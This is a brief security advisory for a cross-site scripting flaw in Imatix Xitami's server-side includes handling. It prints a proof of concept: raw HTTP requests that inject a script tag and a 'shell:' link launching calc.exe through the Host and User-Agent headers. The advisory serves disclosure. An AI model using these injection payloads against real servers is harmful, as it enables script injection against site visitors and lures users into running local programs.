|
|
Imatix Xitami Server Side Includes Cross-Site Scripting Vulnerability
No exploit is required to leverage this issue. The following proof of concept has been provided: Telnet (dont netcat!) to port 80: GET /testssi.ssi HTTP/1.1 Host: localhost User-Agent: <A HREF="shell:windows\system32\calc.exe">PLEASE CLICK HERE</A> Connection: close GET /testssi.ssi HTTP/1.1 Host: <script>alert("Please click at \"PLEASE CLICK HERE\"")</script> User-Agent: <A HREF="shell:windows\system32\calc.exe">PLEASE CLICK HERE</A> Connection: close |
|
Privacy Statement |